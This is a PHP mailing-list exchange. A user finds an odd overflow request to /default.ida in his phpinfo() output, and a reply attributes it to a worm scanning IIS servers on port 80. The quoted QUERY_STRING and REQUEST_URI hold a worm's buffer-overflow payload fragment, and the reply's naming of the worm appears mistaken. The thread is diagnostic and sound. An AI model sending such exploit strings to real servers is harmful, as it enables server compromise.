That's the request string of the W32Nimda worm, it has propagated very fast
in the Internet.
Info and tool for removing it are at:
http:[EMAIL PROTECTED]
If you are running under an IIS webserver, it could be the server itself
that could be infected and sending the request string to itself. The worm
sends various strange requests to ALL servers found with port 80 open,
including the infected server.
"Jeroen Geusebroek" <[EMAIL PROTECTED]> wrote in message
000001c143d2$293ad840$0101a8c0@pipi">news:000001c143d2$293ad840$0101a8c0@pipi...
>
> While viewing my phpinfo() page, i got this:
>
> QUERY_STRING
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
> d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
> =a
>
> REQUEST_URI
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a
>
> Of course I wasn't using this query for my phpinfo() page. Where did PHP
> get this information from? This info was under the header "Environment"
> Not that I have any troubles with this, but it seems weird to me.
>
> Thanks,
>
> Jeroen
>
> Ps. Of course I know what that QUERY is, but why is it in my phpinfo()
> output when I didn't use that query?
>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
